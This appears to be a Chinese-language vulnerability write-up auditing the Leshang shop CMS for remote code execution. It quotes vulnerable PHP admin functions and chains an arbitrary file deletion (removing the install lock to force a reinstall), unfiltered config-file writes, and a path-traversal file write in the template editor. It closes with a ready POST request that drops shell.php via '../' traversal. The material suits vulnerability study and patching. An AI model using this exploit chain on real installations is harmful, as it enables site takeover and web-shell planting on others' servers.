首页 > 代码库 > 乐尚商城getshell

乐尚商城getshell

Luan老师讲完之后 趁热打铁复习了一下

链接:http://pan.baidu.com/s/1qYTsIi4 密码:nnmu

漏洞触发位置在

技术分享

点击删除

admin.php/cache/dels 

跟进函数

文件位置/admin/controls/backup.class.php

function dels(){
  $bu=D("Backup");
  $id=$_POST[‘id‘];
  if(!count($id)){
  $this->error("请选择删除项目", 1);
  }
  if($bu->dels($id)){
     $this->success("删除成功!", 1, "backup/index");
  } else {
     $this->error("删除失败!", 1);
  }
}

继续跟进Backup类的dels函数

文件在/admin/models/backup.class.php

function dels($id){
    $num=0;
    $n=count($id);
    foreach($id as $v){
$filename=trim($v);
$path=PROJECT_PATH."backup/".$filename;
if(Simfile::delete($path)){
    $num++;
}
    }
    if($n==$num){
return true;
    }
    return false;
}

再跟进delete没有过滤也就是说id没有任何过滤就导致了任意文件删除

    public static function delete($filename) {
        $filename = rtrim($filename, ‘/\\‘);
        if (is_dir($filename)) {
            if (($dh = @opendir($filename)) !== false) {
                while (false !== ($file = readdir($dh))) {
                    if ($file != "." && $file != "..") {
                        $path = $filename . ‘/‘ . $file;
                        is_dir($path) ? self::delete($path) : @unlink($path);
                    }
                }
                closedir($dh);
            }
            return rmdir($filename);
        } else {
            return unlink($filename);
        }
    }

删除安装文件留下的lock就可以重装cms

    function change_config(){
            $configArray=array("HOST"=>trim($_POST[‘dbhost‘]),
                               "USER"=>trim($_POST[‘dbuser‘]),
                               "PASS"=>trim($_POST[‘dbpass‘]),
                               "DBNAME"=>trim($_POST[‘dbname‘]),
                               "TABPREFIX"=>trim($_POST[‘dbpre‘])
                               );
            $filename="../config.inc.php";
            $configText = file_get_contents($filename);
            foreach($configArray as $key => $val) {
                $pattern[]=‘/define\(\"‘.$key.‘\",\s*.+\);/‘;
                $repContent[]=‘define("‘.$key.‘", "‘.$val.‘");‘;
            }
            $configText = preg_replace($pattern, $repContent, $configText);
            return file_put_contents($filename, $configText);

技术分享

没有经过任何过滤 直接写入文件导致getshell

还有个

技术分享

 

本以为点击这个会有目录遍历漏洞

跟进函数

    function mod(){
            $file=trim($_POST[‘name‘]);
            $dir=trim($_POST[‘dir‘]);
            $tpl_content =$_POST[‘tpl_content‘];
            $current_dir=trim($_POST[‘current_dir‘]);
            $config=D("Config");
            $config_data=$config->config_list();
            if($current_dir=="tpl"){
                $filename=dirname(dirname(__FILE__))."/../../"."home/views/".$config_data[0][‘template‘]."/".$dir."/".$file;
            } else {
                $filename=dirname(dirname(__FILE__))."/../../"."home/views/".$config_data[0][‘template‘]."/resource/".$dir."/".$file;
            }
            if(!$handle = @fopen($filename, ‘wb‘)){
                $this->error("打开目标模版文件失败,请检查模版目录的权限",1);
            }
            if(fwrite($handle, $tpl_content) === false){
                $this->error(‘写入目标 $file 失败,请检查读写权限‘,1);
            }
            fclose($handle);
            $this->success("编辑成功!", 1);
        }

没有多余的过滤直接写文件了

http://127.0.0.1/admin.php/code/mod
POST:
tpl_content=<?php phpinfo();?>&name=shell.php&dir=index/../../../../../&$current_dir=tpl

乐尚商城getshell